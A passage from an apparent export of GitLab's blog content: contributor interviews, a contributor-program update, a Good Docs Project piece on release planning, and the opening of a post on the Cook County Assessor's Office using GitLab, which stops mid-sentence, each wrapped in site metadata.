GitLab. This month, we're featuring Jacopo\nBeschi, who is based in Italy and is also a member of the [Core Team](/community/core-team/).\n\n### How long have you been contributing to GitLab?\n\nI've been contributing since late 2016.\n\n### Why and how did you decide to contribute to GitLab?\n\nI was looking for an interesting open source software application mostly written\nin Ruby to contribute to. After some Googling around, I found GitLab and instantly\nfell in love with the application and this community.\n\n### Which areas of the GitLab product do you contribute to?\n\nI've contributed to multiple areas of GitLab, such as [backend](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/18757),\n[frontend](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/9890),\n[API](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/16478),\n[Utility](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/11579),\nand [Quality](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/15188)\nwhich are written in Rails.\n\nI haven’t had a chance to contribute to the Golang part of GitLab, such as\n[GitLab Runner](https://docs.gitlab.com/runner/), [Gitaly](https://docs.gitlab.com/ee/administration/gitaly/),\nor [GitLab Workhorse](https://gitlab.com/gitlab-org/gitlab-workhorse).\n\n### Can you tell us what you do professionally?\n\nCurrently, I work as technical lead for [Iubenda](http://www.iubenda.com), a SaaS\nprovider focused on privacy and cookie policies.\n\n### What do you like to do when you're not working?\n\nWhen I’m not working, I enjoy training in the gym and spending time with my wife and friends.\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nDon’t be nervous about getting started! 
This [Contributing to GitLab page](/community/contribute/)\nexplains all the steps you need to take in order to be a successful contributor,\nand I encourage people to start there.\n\nGitLab also has a lot of [online documentation](https://docs.gitlab.com/) that\nyou could search in order to solve most common questions that developers have.\n\n### Do you have anything else you’d like to share?\n\nContributing to GitLab not only enhances your resume but also allows you to get\nin touch with great people who can help you improve your technical knowledge.\nIn addition, your contribution to GitLab will affect the lives of thousands of\ndevelopers around the globe!\n\n## Interested in learning how you can contribute?\n\nAs Jacopo already suggested, a good place to start is the\n[Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1571,"featured":6,"template":689},"contributor-post-jacopo","content:en-us:blog:contributor-post-jacopo.yml","Contributor Post Jacopo","en-us/blog/contributor-post-jacopo.yml","en-us/blog/contributor-post-jacopo",{"_path":1577,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1578,"content":1583,"config":1588,"_id":1590,"_type":14,"title":1591,"_source":16,"_file":1592,"_stem":1593,"_extension":19},"/en-us/blog/contributor-post-luke",{"title":1579,"description":1580,"ogTitle":1579,"ogDescription":1580,"noIndex":6,"ogImage":1192,"ogUrl":1581,"ogSiteName":673,"ogType":674,"canonicalUrls":1581,"schema":1582},"GitLab Code Contributor: Luke Picciau","New contributor Luke Picciau shares why he started contributing to GitLab.","https://about.gitlab.com/blog/contributor-post-luke","\n                        {\n        
\"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Luke Picciau\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-10-04\",\n      }",{"title":1579,"description":1580,"authors":1584,"heroImage":1192,"date":1585,"body":1586,"category":10,"tags":1587},[704],"2018-10-04","\nFor this month's blog post, we're featuring a new contributor [Luke Picciau](https://gitlab.com/Qwertie), who started contributing to GitLab a few months ago.\n\n### When did you first contribute to GitLab?\nMy first contribution was in July 2018, with my MR to [add a button for regenerating 2FA codes](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/20295).\n\n### Why and how did you decide to contribute to GitLab?\nI have been using GitLab pretty heavily since 2014. I decided to start contributing in order to practice developing features on a large project. Because I am very familiar with features of GitLab from the user perspective, navigating the code was easy and I was able to start adding new features quickly.\n\n### Which area(s) of the GitLab product are you interested in contributing to?\nI’d love to look into the new [Web IDE](https://docs.gitlab.com/ee/user/project/web_ide/) and see what improvements could be made, as I see this as a useful tool. Personally, I’d like to use it to write posts for my static site and see the compiled result in my browser as well.\n\n### Can you tell us what you do professionally (or academically if you're going to school)?\nI am a full stack web developer. I primarily use Rails and VueJS. Currently I am also studying for a Bachelor of Information Technology at the University of South Australia. I’m also building an open source website for fitness tracking and analytics of GPS recordings. 
It’s not quite ready to use yet, but I am pushing regular updates to [the repo](https://gitlab.com/pikatrack/pikatrack).\n\n### What do you like to do when you're not working or studying?\nI’ll often be helping open source projects such as mapping the local area on [Open Street Map](https://www.openstreetmap.org). I also love to go down to the mountain bike parks around Adelaide.\n\n### Can you tell us where you live and what you like about your area?\nI live in [Adelaide, South Australia](https://www.google.com/maps/place/Adelaide+SA,+Australia/@-35.0278392,134.1260638,6z/). My favorite thing about the area is living close to so many national parks and amazing mountain bike trails which give endless exploration possibilities.\n\n![Luke on his mountain bike](https://about.gitlab.com/images/blogimages/Luke_Picciau_mountain_biking_new.jpg){: .shadow.small.center}\n\n### What advice do you have for others who may be interested in contributing to GitLab?\nOne of the things I find most useful is using an IDE or text editor with “go to definition” support. This allows you to click on function and class names and be taken to the place where they are defined. This, in my opinion, is an essential feature for working on a codebase as large as GitLab, especially in a language like Ruby, where it can be difficult to work out where things have been imported from. I personally use [RubyMine](https://www.jetbrains.com/ruby/), but I have been told [Vim](https://www.vim.org/) can also be set up with good Ruby support. Another tip I have is if you get part way through making a change and get stuck on something or need advice on what should be done, commit the changes and [create a merge request](https://docs.gitlab.com/ee/user/project/merge_requests/creating_merge_requests.html#doc-nav) with what you have done and any questions you have. 
Someone should reply to the merge request to help you get the changes finished and ready for merge.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1589,"featured":6,"template":689},"contributor-post-luke","content:en-us:blog:contributor-post-luke.yml","Contributor Post Luke","en-us/blog/contributor-post-luke.yml","en-us/blog/contributor-post-luke",{"_path":1595,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1596,"content":1601,"config":1606,"_id":1608,"_type":14,"title":1609,"_source":16,"_file":1610,"_stem":1611,"_extension":19},"/en-us/blog/contributor-post-siemens",{"title":1597,"description":1598,"ogTitle":1597,"ogDescription":1598,"noIndex":6,"ogImage":1192,"ogUrl":1599,"ogSiteName":673,"ogType":674,"canonicalUrls":1599,"schema":1600},"GitLab Code Contributor: Alexis Reigel","Alexis Reigel shares his experience as a GitLab contributor on behalf of Siemens.","https://about.gitlab.com/blog/contributor-post-siemens","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Alexis Reigel\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-12-18\",\n      }",{"title":1597,"description":1598,"authors":1602,"heroImage":1192,"date":1603,"body":1604,"category":10,"tags":1605},[704],"2018-12-18","\nFor this month's blog post, we're featuring [Alexis Reigel](https://gitlab.com/koffeinfrei). 
Alexis was also an [MVP for GitLab 9.5 and 10.8](/community/mvp/).\n\n![Alexis Reigel](https://about.gitlab.com/images/blogimages/Alexis_Reigel.jpeg){: .shadow.small.center}\n\n### How did you get involved with contributing to GitLab?\n\nMy Siemens colleagues have been using GitLab since 2013 with [GitLab 5.2](/releases/2013/05/22/gitlab-5-dot-2-released/). The *[upstream first](https://www.redhat.com/blog/verticalindustries/why-upstream-contributions-matter-when-developing-open-source-nfv-solutions/)* principle is important at Siemens, as they don't want to maintain local patches/forks of software. I was hired to contribute features to GitLab that are needed at Siemens, and this give-and-take process between contributors and users is what is great about open source software. My first contribution was the ability to add a [custom brand header logo in emails](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/9049), which I created on Feb. 7, 2017 and was merged on Feb. 22, 2017.\n\n### What was your experience with the first merged MR?\n\nThere was no controversy with my first MR, and therefore not much debate before it was merged. The review was very quick and the relevant people chimed in right from the start. For some of the later, more complicated merge requests, it was not always this straightforward. Depending on how complicated the MR is and how many people from GitLab participate, the process may take longer and generate a lot of discussions.\n\n### What advice do you have for others who may be interested in contributing to GitLab? In particular, any insights you can share with current GitLab customers who may be thinking about making code contributions?\n\nFirst, I recommend reviewing existing MRs and issues before submitting an MR. In many cases, there are already discussions and potential solutions for a certain feature or bug fix. 
It's also helpful to find out [who from GitLab](/company/team/) is relevant or responsible for a certain area so you can ping the right person from the start.\n\nThe initial contribution should always be a minimal solution or what GitLab calls a [\"Minimum Viable Change (MVC)\"](/handbook/product/product-principles/#the-minimal-viable-change-mvc), because the solution will often change with feedback. The initial contribution should be considered a starting point for collaboration between the contributor and GitLab team-members.\n\nIn some cases, a contributor may need to be patient with their MR, as depending on the topic and complexity it may take some time to move things forward. The people from GitLab are always very kind and friendly so the discussions are respectful.\n\n### Do you have other colleagues at Siemens who also contribute to GitLab? How do you go about planning and working on your contributions?\n\nYes, there are several colleagues who are active within the GitLab community and you will see [Siemens mentioned in MRs](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/?scope=all&utf8=%E2%9C%93&state=merged&search=siemens).\n\nMy Siemens colleagues collect issues and feature requests internally and prioritize them based on how important and urgent they are. After discussing feature requests with coworkers to make sure we have a common understanding of the intended functionality, I start to work on the issues according to their priority. I have a lot of freedom and trust from Siemens on what the solution I contribute should look like.\n\n### What do you like to do when you're not working?\n\nI work on several other free and open source projects such as [Metaflop](https://www.metaflop.com/), [Mykonote](https://github.com/panter/mykonote/blob/master/README.md), and others in my spare time. Apart from that, I like spending time with my family and friends. 
If there's any time left, I make and listen to music or watch a movie or two.\n\n### Anything else you want to share with the community?\n\nGitLab is a great product and is one of the friendliest and healthiest open source communities. Contributing to such a large project may seem daunting at first, but will pay off in the end. Your contribution will be appreciated by GitLab team-members as well as everyone who uses the product.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1607,"featured":6,"template":689},"contributor-post-siemens","content:en-us:blog:contributor-post-siemens.yml","Contributor Post Siemens","en-us/blog/contributor-post-siemens.yml","en-us/blog/contributor-post-siemens",{"_path":1613,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1614,"content":1619,"config":1624,"_id":1626,"_type":14,"title":1627,"_source":16,"_file":1628,"_stem":1629,"_extension":19},"/en-us/blog/contributor-post-vitaliy",{"title":1615,"description":1616,"ogTitle":1615,"ogDescription":1616,"noIndex":6,"ogImage":1192,"ogUrl":1617,"ogSiteName":673,"ogType":674,"canonicalUrls":1617,"schema":1618},"GitLab Code Contributor: Vitaliy Klachkov","Core Team member Vitaliy Klachkov shares how he started contributing to GitLab.","https://about.gitlab.com/blog/contributor-post-vitaliy","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Vitaliy Klachkov\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": 
\"2018-08-08\"\n      }",{"title":1615,"description":1616,"authors":1620,"heroImage":1192,"date":1621,"body":1622,"category":10,"tags":1623},[704],"2018-08-08","\nWelcome to our new blog series featuring code contributors from the GitLab community! This blog will highlight the wonderful contributions made by GitLab community members and will hopefully inspire others to contribute to GitLab. For the first blog post, we are happy to welcome [Vitaliy “blackst0ne” Klachkov](https://gitlab.com/blackst0ne), who has been chosen as a [release MVP](/community/mvp/) three times!\n\n### How long have you been contributing to GitLab?\n\nI've been contributing since August 2016.\n\n### Why and how did you decide to contribute to GitLab?\n\nI read a news article about a new GitLab release and I didn’t even know what GitLab was back then. There was also a discussion on an example of a Rails-based project with a good codebase, and people suggested taking a look at GitLab.\n\nI was intrigued and decided to take a closer look at GitLab. I actually found\nroom for improvement in the codebase so I started pushing a few merge requests (MRs). I received responses within 1-2 days and I was very impressed. With some of the other communities, I’m used to waiting weeks for feedback.\n\nSo, I kept submitting more merge requests and so far, I have 227 merged MRs. I’m proud that I’m one of the top 50 contributors among 2000+ GitLab [code contributors](http://contributors.gitlab.com/) that include GitLab employees.\n\n### Which areas of the GitLab product do you contribute to?\n\nMostly it has been backend changes, but many of my MRs touched the frontend as well. I spent my time bringing popular features (e.g. 
[squash and merge to CE](https://docs.gitlab.com/ee/user/project/merge_requests/squash_and_merge.html#doc-nav), [mermaid support](https://docs.gitlab.com/ee/user/markdown.html#mermaid), [switch markdown engine to CommonMark](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/14835), [customizable branch name from issues](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/13884), etc.), fixing technical debts (e.g. [migrate all spinach specs to rspec](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests?scope=all&utf8=%E2%9C%93&state=all&author_username=blackst0ne&label_name%5B%5D=technical%20debt&label_name%5B%5D=Quality&search=Spinach)), upgrading [GitLab to Rails 5.0](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=all&author_username=blackst0ne&label_name%5B%5D=rails5), and many other improvements.\n\n### Can you tell us what you do professionally?\n\nI am a full-stack web developer at [GEOPHYSTECH LLC](https://geophystech.ru/). The company is focused on seismology, earthquakes, and everything related to earthquake hazards.\n\n### What do you like to do when you're not working?\n\nI’m a big fan of sports or anything that keeps my body moving, such as running, swimming, snowboarding, table tennis, volleyball, ice-blading, football, CrossFit workout, etc.\n\nI also enjoy [chess](https://lichess.org/), reading books/articles, and UX-related things. I’ve been collaborating with GitLab’s UX team.\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nContributing to GitLab is easy. If you want the experience of being a part of a popular open source project, you are more than welcome to join the GitLab community! You can also ping me on [Twitter](https://twitter.com/blackst0ne) if you have any questions or need any help as you get started.\n\n### Do you have anything else you’d like to share?\n\nGitLab has some nice [swag](https://shop.gitlab.com/)! 
I’ve gotten some great ones for my release MVPs.\n\n## Interested in learning how you can contribute?\n\nA good place to start would be the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, and translation.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1625,"featured":6,"template":689},"contributor-post-vitaliy","content:en-us:blog:contributor-post-vitaliy.yml","Contributor Post Vitaliy","en-us/blog/contributor-post-vitaliy.yml","en-us/blog/contributor-post-vitaliy",{"_path":1631,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1632,"content":1637,"config":1642,"_id":1644,"_type":14,"title":1645,"_source":16,"_file":1646,"_stem":1647,"_extension":19},"/en-us/blog/contributor-program-update",{"title":1633,"description":1634,"ogTitle":1633,"ogDescription":1634,"noIndex":6,"ogImage":1348,"ogUrl":1635,"ogSiteName":673,"ogType":674,"canonicalUrls":1635,"schema":1636},"Updates from the GitLab contributor community","Here's what's happening with the wider contributor community.","https://about.gitlab.com/blog/contributor-program-update","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Updates from the GitLab contributor community\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-04-17\",\n      }",{"title":1633,"description":1634,"authors":1638,"heroImage":1348,"date":1639,"body":1640,"category":10,"tags":1641},[704],"2019-04-17","\n\nI joined GitLab in June 2018, and it's been exciting to work with our wider community of contributors.\nOne of the first things I did when I started was to look into community metrics to get a better\nunderstanding of the community, and here are a couple of numbers I'd like to share:\n\nSince 2016, about 15 percent of merged 
MR for the [GitLab Community Edition](https://gitlab.com/gitlab-org/gitlab-ce)\nwere contributed by community members (see the chart below). In addition, we had over 200\nfirst-time contributors to GitLab between the 11.5 and 11.9 releases, and it's been fun seeing [people\ncelebrate their first merged MRs on Twitter](https://twitter.com/hashtag/myFirstMRmerged?src=hash).\n\n![Community contribution to CE](https://about.gitlab.com/images/blogimages/contributor-pgm-blogpost/CE_Merged_MRs_since_Jan_2016.png){: .medium.center}\n\nIt's definitely fun being part of a growing community, and I wanted to provide a quick update\non a number of items that we have been working on.\n\n## Core Team updates\n\n### Monthly calls\n\nThe [Core Team](/community/core-team/) consists of individuals who have made sustained contributions\nto GitLab and their mission is to represent the wider GitLab community.\nI started scheduling a regular call with Core Team members\nand I've been very impressed with the quality of discussions we have each month.\nCore Team members helped improve responsiveness to community contributions, Hackathons,\nand even revamped the Core Team page itself. Everyone is welcome to join the call, and the\nlogistics, notes, slides, etc. are available on the [Monthly Core Team meeting page](https://gitlab.com/gitlab-core-team/general/wikis/monthly-core-team-meeting).\nIf you want to watch recordings of previous meetings, you can check out the [Core Team meeting playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthZ12EUkq3N9QlThvkf3WGnZ).\n\n![GitLab Core Team](https://about.gitlab.com/images/blogimages/contributor-pgm-blogpost/Core_Team.png){: .shadow.small.center}\n\n### New additions to the team\n\nThere have also been changes to the Core Team composition. To provide additional support,\nthere will be up to two GitLab company team members forming part of the\nCore Team. 
So, I'm excited to share that [Rémy Coutable](https://gitlab.com/rymai) and\n[Winnie Hellmann](https://gitlab.com/winh) are now members of the Core Team.\nWinnie was actually a Core Team member prior to joining GitLab, and Rémy has been working\nwith Core Team members for the past several years, so they're perfect additions to the team.\n\nIn addition to the two GitLab team-members, [Ben Bodenmiller](https://gitlab.com/bbodenmiller)\nand [George Tsiolis](https://gitlab.com/gtsiolis) joined the Core Team in the past several months.\nAs you will see in the next section, both Ben and George were two of the top code contributors in 2018.\n\n## Recognizing regular contributors\n\nIn addition to the Core Team members, we also have dozens of members of the wider community\nmaking regular contributions to GitLab. In order to recognize their work, I started a\n[top contributors page](/community/top-annual-contributors/index.html) and\nplan to update this each year to highlight regular contributors. Following examples from other\nopen source communities, we now have badging for three different levels of contributions.\nShortly, we will be sending out special GitLab merchandise to these contributors so they can\ncelebrate their accomplishments. My hope is that we will see an increase in the number of regular\ncontributors in the years to come. In addition to the number of contributors, I also want to improve the diversity of regular contributors – whether it's gender, geography, occupation, etc. – and will start a conversation on this topic in various forums, including the Core Team meeting. 
\n\n![Contributor badges](https://about.gitlab.com/images/blogimages/contributor-pgm-blogpost/contributor_badges.png){: .shadow.small.center}\n\n## \"Contribute for prize\" issues\n\nIf you participated in the [Q1 Hackathon](/blog/q1-hackathon-recap/),\nyou probably remember that we highlighted an issue in each [product stage](/handbook/product/categories/)\nto encourage people to contribute for a special hackathon prize. Following the success of this\nin the Hackathon, we created a new label `Contribute for prize` to encourage community members\nto work on priority issues on an ongoing basis. You can find more information in the [contributor success handbook page](/handbook/marketing/developer-relations/contributor-success/community-contributors-workflows.html#supporting-the-wider-community-contributors)\nand I encourage everyone to [search for issues with the label `Contribute for prize`](https://gitlab.com/gitlab-org/gitlab-ce/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Contribute%20for%20prize) to start working on them.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":1643,"featured":6,"template":689},"contributor-program-update","content:en-us:blog:contributor-program-update.yml","Contributor Program 
Update","en-us/blog/contributor-program-update.yml","en-us/blog/contributor-program-update",{"_path":1649,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1650,"content":1656,"config":1663,"_id":1665,"_type":14,"title":1666,"_source":16,"_file":1667,"_stem":1668,"_extension":19},"/en-us/blog/coordinating-documentation-projects-gitlab",{"title":1651,"description":1652,"ogTitle":1651,"ogDescription":1652,"noIndex":6,"ogImage":1653,"ogUrl":1654,"ogSiteName":673,"ogType":674,"canonicalUrls":1654,"schema":1655},"Coordinating major documentation projects with GitLab","Members of The Good Docs Project explain how to plan, coordinate, and release major documentation projects using GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669791/Blog/Hero%20Images/abstractprocess.png","https://about.gitlab.com/blog/coordinating-documentation-projects-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Coordinating major documentation projects with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Alyssa Rock\"},{\"@type\":\"Person\",\"name\":\"Aaron Peters, Member, Good Docs Project\"}],\n        \"datePublished\": \"2023-08-24\",\n      }",{"title":1651,"description":1652,"authors":1657,"heroImage":1653,"date":1660,"body":1661,"category":10,"tags":1662},[1658,1659],"Alyssa Rock","Aaron Peters, Member, Good Docs Project","2023-08-24","\n[The Good Docs Project](https://thegooddocsproject.dev/) recently achieved a significant milestone: releasing [version v1.0.0 of our project](https://gitlab.com/tgdp/templates/-/releases/v1.0.0). 
It was an exciting moment for [our community of contributors](https://go.gitlab.com/16yEa3) dedicated to improving the quality of software documentation by sharing best practices — the first time we felt confident putting our production-ready documentation templates into the world for other software projects to review, use, and help us improve.\n\nOrganizing and executing a release of this magnitude requires extensive planning and sophisticated project management tools. Luckily, our community uses GitLab, so we had everything we needed at our disposal.\n\nIn this article, we'll explain how we used GitLab to meet our goal of bringing Version 1.0 (codenamed \"Capilano\") to the world. Our release process consists of four general phases:\n* [Scheduling](#scheduling-a-release)\n* [Planning](#planning-a-release)\n* [Tracking](#tracking-a-release)\n* [Releasing](#release-day)\n\nWe'll share how we use GitLab in each of those phases to achieve a successful project release.\n\n## Scheduling a release\n[The Good Docs Project](https://about.gitlab.com/blog/meet-partner-the-good-docs-project/) releases template updates twice a year: on June 15 and December 15. Each of our releases receives both a number and a codename in honor of a famous bridge (because we're \"bridging the documentation gap for our users\"). Last December, for example, we issued the [Version 0.3.0, codenamed \"Brooklyn Bridge\"](https://thegooddocsproject.dev/blog/template-release-0.3.0-using-our-own-templates/) release. In June, we finished [Version 1.0.0, which was codenamed \"Capilano\"](https://gitlab.com/tgdp/templates/-/releases/v1.0.0) for [a bridge in Canada](https://en.wikipedia.org/wiki/Capilano_Suspension_Bridge). 
And now we're starting work on the [Dragon](https://gitlab.com/groups/tgdp/-/milestones/4) release, which gets its name from [a bridge on the River Han in Vietnam](https://en.wikipedia.org/wiki/Dragon_Bridge_(Da_Nang)).\n\n![The Good Docs Project Release Process](https://about.gitlab.com/images/blogimages/tgdp-release-cycle.jpg){: .shadow}\n\nOur release schedule prioritizes *work time* over *work scope*. We set goals we wish to accomplish with every release, then use the release deadline as a motivational tool to get projects done. However, we [don't delay releases](https://handbook.gitlab.com/teamops/measurement-clarity/#prioritize-due-dates-over-scope) for a particular release initiative per se. Instead, we try to accurately scope and track our release initiatives to ensure they complete in time for their desired release.\n\n## Planning a release\nFor the first month of our six-month release cycle, each of The Good Docs Project's working groups or teams determines initiatives for the cycle. They usually hold an initial brainstorming session, which involves using a synchronous collaboration tool (like Miro) to determine which ideas to include as official goals for the release. But after confirming and committing what we want to do with each release, we migrate all those objectives to GitLab, where we communicate them to the rest of the community. 
That process generally looks like this:\n* Open an issue in a release's respective repository and we tag it with the milestone for that release\n* Attach [scoped labels](https://docs.gitlab.com/ee/user/project/labels.html#scoped-labels) to indicate which working group is assigned to that task\n* Assign an initial [health status](https://docs.gitlab.com/ee/user/project/issues/managing_issues.html#health-status) of \"On track\"\n* Assign the issue [a weight](https://docs.gitlab.com/ee/user/project/issues/issue_weight.html) to indicate its importance\n\nThen, in a general community meeting where we end the release planning process, everyone identifies what they'll commit to, and we begin using the milestone to track progress and [a global project board to track the health status](https://gitlab.com/groups/tgdp/-/boards/5867329?milestone_title=Dragon%20release) when we do stand-ups to [report on progress](https://gitlab.com/groups/tgdp/-/milestones/4).\n\nTo prioritize effectively, we draw on guidance from our team of template product managers, who [perform extensive user research](https://tinyurl.com/template-brainstorming-report) into the templates our users or potential users think we should add to the roadmap. We attend conferences and engage with both technical writers and developers to hear what they want from our product. This team of product managers then distills this information into a long-term product roadmap that informs which template issues are strategically important to our project. We then translate that roadmap into issues in [our project backlog](https://gitlab.com/tgdp/templates/-/issues/?sort=updated_desc&state=opened&first_page_size=100).\n\n## Tracking a release\nGaining access to [GitLab's project management features](/pricing/feature-comparison/) was one of our primary motivations for adopting the platform in the first place. These features allow us to track and monitor our progress toward a release. 
We love that with GitLab we can manage multiple sub-projects and repositories under our organization, but still view all the issues on a \"single pane of glass.\" This allows working groups and teams to work in their individual repositories, but gives us a high-level overview of their work at the organizational level, using features like milestones and scoped labels.\n\nTo track our releases, we configure a project milestone that runs for the full release time period. The milestone shows all the initiatives we're working on, as well as our progress toward each on [an organization-wide burndown chart](https://gitlab.com/groups/tgdp/-/milestones/3#tab-issues). We use [scoped labels](https://docs.gitlab.com/ee/user/project/labels.html#scoped-labels) (labels that can only be assigned to one value at a time) on each issue to track which working group is working on that initiative. We also use GitLab's [health status feature](https://docs.gitlab.com/ee/user/project/issues/managing_issues.html#health-status) to track whether the initiative is on track or at risk of falling behind schedule. On top of that, we create a project board that helps us visualize all the project's active issues and initiatives, filtered by each working group. Our project board provides insights into the work each group is doing and gives us a sense of the release's overall progress toward our release goals.\n\nThese boards are a focal point of our weekly general meetings. We review the milestone and project board, then check in with working group and team leads to make sure their work toward the release is going well. These meetings are opportunities to identify potential blockers preventing (or threatening to prevent) the work from getting done — or to communicate if any of our earlier estimates need to be adjusted. We build some flexibility into our release planning and tracking processes in case we need to make mid-release changes or course corrections. 
For example, we determine which individual template projects we'll add to a release *during the release process itself*, rather than during the release planning stage we described earlier. Since those projects are dependent on volunteer work that can't always be controlled by the project leads, we wait to officially add them to a release until we can be certain a template project will be ready for release day.\n\n## Release day\nWhen release day finally arrives, our [Tech Team](https://thegooddocsproject.dev/who-we-are/#tech-team) meets to tag the release in the templates repository and build our artifacts, including all our zip files and tarballs for our templates. To do that, the team:\n* Verifies that all merge requests are complete\n* Creates a tag for the templates repository for the main branch and adds a tag message indicating it is for a release\n* Adds a release title, tags it with our milestone for that release, confirms the date, and adds the release notes (using [our community's own release notes template](https://gitlab.com/tgdp/templates/-/releases/v1.0.0), of course) by using the `Create Release` button on the release screen\n* Creates the release; GitLab generates all the files from our repository, including zips, tarballs, and JSON artifacts\n* Publishes a link to our release and the artifacts on our website\n\nWe try to ensure we've recognized and tagged every project member who contributed directly to the templates release. That includes people who wrote templates, improved existing templates, or created examples for our templates. Then, the Tech Team publishes the artifacts and release notes to our website and publishes an announcement to all our internal and external communication channels.\n\nWe believe it's important to take breaks. For that reason, our project always takes a three-week break after release day. For those three weeks, we encourage all our project members to get some well-deserved rest and relaxation. 
We don't hold any meetings during this time, and we encourage people to only communicate lightly with other project members.\n\nThen we regroup in July or January — and start the release process all over again!\n\nIt's not too late to join our next release and experience this process firsthand. Just visit [The Good Docs Project community page](https://thegooddocsproject.dev/community/) to learn how to get started.\n\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n{: .note}\n",[9,267,1099],{"slug":1664,"featured":6,"template":689},"coordinating-documentation-projects-gitlab","content:en-us:blog:coordinating-documentation-projects-gitlab.yml","Coordinating Documentation Projects Gitlab","en-us/blog/coordinating-documentation-projects-gitlab.yml","en-us/blog/coordinating-documentation-projects-gitlab",{"_path":1670,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1671,"content":1677,"config":1683,"_id":1685,"_type":14,"title":1686,"_source":16,"_file":1687,"_stem":1688,"_extension":19},"/en-us/blog/creating-a-transparent-digital-democracy",{"title":1672,"description":1673,"ogTitle":1672,"ogDescription":1673,"noIndex":6,"ogImage":1674,"ogUrl":1675,"ogSiteName":673,"ogType":674,"canonicalUrls":1675,"schema":1676},"Government agency builds transparent democracy using GitLab","The Cook County Assessor’s office explains how they're using GitLab to help create a new level of government transparency.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679611/Blog/Hero%20Images/cook-county-blog-unsplash.jpg","https://about.gitlab.com/blog/creating-a-transparent-digital-democracy","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How one government agency is creating a 
transparent digital democracy with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brein Matturro\"}],\n        \"datePublished\": \"2019-09-02\",\n      }",{"title":1678,"description":1673,"authors":1679,"heroImage":1674,"date":1680,"body":1681,"category":10,"tags":1682},"How one government agency is creating a transparent digital democracy with GitLab",[884],"2019-09-02","\n\nAt GitLab Connect Chicago, Robert Ross, chief data officer at the Cook County Assessor’s Office,\npresented the talk, “An experiment in digital democracy: How the Cook County Assessor’s\nOffice is using GitLab to reach a new level of transparency.”\n\nThe Chicago Assessor’s Office is responsible for predicting the value of over a million pieces of\nreal estate and reassessing them every three years. Record keeping has always been on paper and\nonly recently has “marginally sophisticated computer programming” been used. Now the Assessor's Office\nwants to turn the process over to software algorithms.\n\n“In a world where the computer is doing the heavy lifting, policy is code and code is policy,”\nRobert says. The algorithms used in assessing a property are dependent on a number of variables. If the\ncode variables are central to the assessment office, as it is for Cook County, it becomes\nimperative that it is made public. “[Our office] ran on a platform of fair, ethical, and\ntransparent assessments. In order to achieve 